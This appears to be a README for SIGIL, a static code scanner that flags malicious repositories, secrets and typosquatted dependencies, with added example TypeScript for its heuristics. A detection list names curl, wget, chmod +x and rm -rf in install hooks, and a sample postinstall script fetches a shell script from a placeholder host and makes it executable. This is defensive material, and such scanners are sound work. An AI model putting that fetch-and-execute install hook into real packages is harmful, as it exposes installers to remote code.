Arcane Intelligence for Code Integrity
SIGIL is an AI-powered, heuristic-driven code scanner designed to protect developers from malicious repositories, suspicious dependencies, and hidden security threats — especially targeting fake job offers and fraudulent bounties.
Inspired by arcane sigils and futuristic Web3 aesthetics, SIGIL provides a clear, actionable security report before you ever run the code.
SIGIL is a developer security companion that analyzes repositories using:
- 🧠 AI-assisted pattern recognition
- ⚡ Heuristic threat detection
- 🔒 Dependency & script inspection
- 🪬 SIGIL Score — a clear risk assessment (LOW / MEDIUM / HIGH)
- 📊 Static analysis only — no code execution for maximum safety
Built for developers who want quick, meaningful insights without deep security knowledge.
Detects:
- Suspicious install/postinstall scripts (curl, wget, chmod +x, rm -rf)
- Dangerous or deprecated dependencies
- High-entropy secrets (private keys, mnemonics, API tokens)
- Wallet drainer patterns
- Obfuscated or unusual JavaScript
- Dangerous files (`.pem`, `.env`, `id_rsa`, `.ps1`, `.bat`, binaries)
- Typosquatting in package names
- Hidden folders and unexpected artifacts
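As an added illustration of the typosquatting check listed above (example code, not SIGIL's own implementation): dependency names are compared against a list of popular packages by edit distance, and near-misses that are not the real name are flagged. The `POPULAR` list and the two-edit threshold are assumptions for the example.

```typescript
// Added example, not SIGIL's own code: a typosquatting heuristic over a manifest's dependency names.
// POPULAR is a constructed sample; a real scanner would derive it from registry download rankings.
const POPULAR = ["lodash", "express", "react", "axios", "chalk", "commander", "ethers", "web3"];
interface TyposquatFinding { name: string; lookalike: string; distance: number }

// Levenshtein edit distance (insert/delete/substitute), single-row dynamic programming.
function editDistance(a: string, b: string): number {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // D[i-1][j-1] for the current j
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // D[i-1][j]
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// Flag dependencies within two edits of a popular name that are not that name itself.
// Scoped packages are compared on the unscoped part (@org/lodahs -> lodahs).
function findTyposquats(deps: Record<string, string>, popular = POPULAR): TyposquatFinding[] {
  const out: TyposquatFinding[] = [];
  for (const name of Object.keys(deps)) {
    const bare = name.replace(/^@[^/]+\//, "").toLowerCase();
    if (popular.includes(bare)) continue;
    for (const p of popular) {
      const d = editDistance(bare, p);
      if (d > 0 && d <= 2) { out.push({ name, lookalike: p, distance: d }); break; }
    }
  }
  return out;
}

// Constructed sample manifest: two lookalikes, one genuine popular package, one unrelated name.
const SAMPLE_DEPS: Record<string, string> = { lodahs: "^4.17.21", expresss: "^4.18.2", express: "^4.18.2", typescript: "^5.0.0" };
```

Short popular names produce false positives (for example `reach` vs `react`), which is why production scanners weight matches by download counts and keep an allow-list.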
Reports:
- Risk level: LOW / MEDIUM / HIGH
- Detailed list of findings with severity
- File locations and context
- AI-generated summary explaining risks in plain language
- Recommended actions for developers
- Elegant landing page with arcane-tech aesthetic
- Clean scanning flow with real-time feedback
- Error handling & validation
- Responsive design
- Demo repositories for testing
Frontend (Next.js) → API (Express) → @sigil/core → Scan Results
Frontend (apps/web):
- Repository URL input
- `/scan` page with loading states
- Results renderer with risk badges
- Error handling
API (apps/api):
- Validates GitHub URLs
- Calls `scanRepository()` from core
- Returns structured JSON findings
- Rate limiting and input sanitization
Core (packages/core):
- Reads repository files via GitHub API (no cloning)
- Applies heuristic rules:
  - Script analysis
  - Dependency checking
  - Secret detection
  - File pattern matching
  - Entropy analysis
- Computes risk score
- Returns consistent output format
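The script, secret and scoring rules above, as an added example (not SIGIL's own code): it scans `package.json` install hooks for the commands the README lists, flags high-entropy `.env` values, and folds the findings into the README's report shape. Severity weights, the LOW/MEDIUM/HIGH cut-offs and the entropy thresholds are assumptions; the AI summary field is omitted.

```typescript
// Added example, not SIGIL's own code: minimal script + secret heuristics in the README's report shape.
type Severity = "low" | "medium" | "high" | "critical";
interface Finding { type: string; severity: Severity; message: string; file: string; details: string }
const SUSPICIOUS_CMDS = ["curl", "wget", "chmod +x", "rm -rf"]; // the README's own list
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Flag install-time scripts that download, mark executable, or delete.
function scanScripts(pkg: { scripts?: Record<string, string> }): Finding[] {
  const findings: Finding[] = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts?.[hook];
    const hits = cmd ? SUSPICIOUS_CMDS.filter((s) => cmd.includes(s)) : [];
    if (hits.length > 0) findings.push({ type: "script", severity: "high", file: "package.json",
      message: `Suspicious ${hook} script detected`, details: `Contains ${hits.join(", ")}` });
  }
  return findings;
}

// Shannon entropy in bits per character; random keys score far above prose or URLs.
function shannonEntropy(s: string): number {
  const counts = new Map<string, number>();
  for (const ch of s) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let h = 0;
  counts.forEach((n) => { const p = n / s.length; h -= p * Math.log2(p); });
  return h;
}

// Flag KEY=value lines whose value is long and high-entropy (32 chars / 4.0 bits are assumed thresholds).
function scanEnv(file: string, text: string): Finding[] {
  const findings: Finding[] = [];
  for (const line of text.split("\n")) {
    const m = /^([A-Z0-9_]+)=(.+)$/.exec(line.trim());
    if (!m) continue;
    const value = m[2].replace(/^["']|["']$/g, "");
    if (value.length >= 32 && shannonEntropy(value) > 4.0) findings.push({ type: "secret",
      severity: "critical", file, message: `Possible secret in ${m[1]}`,
      details: `High entropy string (${shannonEntropy(value).toFixed(2)} bits/char)` });
  }
  return findings;
}
// Severity weights and LOW/MEDIUM/HIGH cut-offs are assumptions, not SIGIL's real scoring.
const WEIGHT: Record<Severity, number> = { low: 5, medium: 15, high: 30, critical: 50 };
function buildReport(repo: string, findings: Finding[]) {
  const score = Math.min(100, findings.reduce((s, f) => s + WEIGHT[f.severity], 0));
  const riskLevel = score >= 60 ? "HIGH" : score >= 25 ? "MEDIUM" : "LOW";
  return { repo, riskLevel, score, findings };
}

// Constructed sample inputs (not a real repository); the token value is random filler.
const SAMPLE_PKG = { scripts: { postinstall: "curl -sL https://example.invalid/s.sh -o s.sh && chmod +x s.sh" } };
const SAMPLE_ENV = 'PORT=3000\nAPI_TOKEN="q7Zp2LxK9vB4mN8cR1tY6wH3jF5gD0sA"\n';
```

Combining `scanScripts(SAMPLE_PKG)` and `scanEnv(".env", SAMPLE_ENV)` through `buildReport` yields one high and one critical finding, a score of 80 and `riskLevel: "HIGH"`, matching the shape of the sample report below.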
Important: SIGIL MVP does not execute any code from analyzed repositories. All analysis is static and safe.
Example scan output:

```json
{
  "repo": "https://github.com/example/repo",
  "riskLevel": "HIGH",
  "score": 85,
  "findings": [
    {
      "type": "script",
      "severity": "high",
      "message": "Suspicious postinstall script detected",
      "file": "package.json",
      "details": "Contains curl command downloading from external source"
    },
    {
      "type": "secret",
      "severity": "critical",
      "message": "Possible private key detected",
      "file": ".env",
      "details": "High entropy string matching private key pattern"
    }
  ],
  "summary": "This repository contains multiple high-risk indicators including suspicious installation scripts and potential leaked credentials. Review carefully before use."
}
```

| Layer | Technology |
|---|---|
| Frontend | Next.js 14 • TailwindCSS • Shadcn/UI |
| Backend | Node.js • Express |
| Core Engine | TypeScript • Heuristics + AI |
| CLI | Node + Commander |
| Monorepo | PNPM + Turborepo |
| Analysis | Static file analysis • GitHub API |
```bash
pnpm install
pnpm dev
```

Access at: http://localhost:3000
SIGIL includes a powerful command-line interface for scanning repositories directly from your terminal.
Installation:
```bash
pnpm install -g sigil-cli
```

Usage:

```bash
# Scan a GitHub repository
sigil scan https://github.com/user/repo

# Scan a local directory
sigil scan ./my-project

# Get help
sigil --help
```

CLI Features:
- 🚀 Fast, lightweight scanning
- 📊 Formatted risk reports in terminal
- 🎨 Color-coded severity levels
- 📝 Detailed findings with file locations
- ⚡ Perfect for CI/CD integration
SIGIL includes demo repositories for testing:
- sigil-demo-clean — Safe repository with no issues
- sigil-demo-suspicious — Contains suspicious postinstall script
- sigil-demo-malicious — Multiple high-risk indicators (leaked keys, obfuscation)
```
sigil/
│
├── apps/
│   ├── web/        → Next.js frontend
│   └── api/        → Express REST API
│
├── packages/
│   ├── core/       → Analysis engine + heuristics
│   └── cli/        → CLI tool
│
└── turbo.json      → Monorepo configuration
```
- Static analysis engine
- GitHub repository scanning
- Heuristic detection rules
- Risk scoring system
- Web interface
- Functional CLI tool (scan repos from terminal)
Phase 1: Enhanced Analysis
- Sandbox execution environment (Docker/QEMU)
- Dynamic behavior monitoring
- Network traffic capture (pcap)
- Filesystem changes tracking
- Syscall analysis
Phase 2: Advanced Security
- SAST integration (Slither, Semgrep, Mythril)
- MISP threat intelligence
- MITRE ATT&CK mapping
- Vulnerability database correlation
Phase 3: Web3 Integration
- On-chain verification (SIGIL Seal)
- Smart contract auditing
- Wallet interaction analysis
- Blockchain attestation (ERC-721 / Stellar)
Phase 4: Enterprise Features
- Team collaboration
- CI/CD integration
- API for automated scanning
- Custom rule creation
- Advanced reporting
SIGIL is designed with security-first principles:
- No code execution in MVP — zero risk of RCE
- Read-only analysis — no modifications to repositories
- Input validation — strict URL and size limits
- Rate limiting — protection against abuse
- Privacy-focused — no storage of analyzed code
- Transparent — open-source heuristics
Contributions are welcome! Please read CONTRIBUTING.md for guidelines.
MIT License — free to use, modify, and expand.
Trust the Sigil. Verify before you clone.
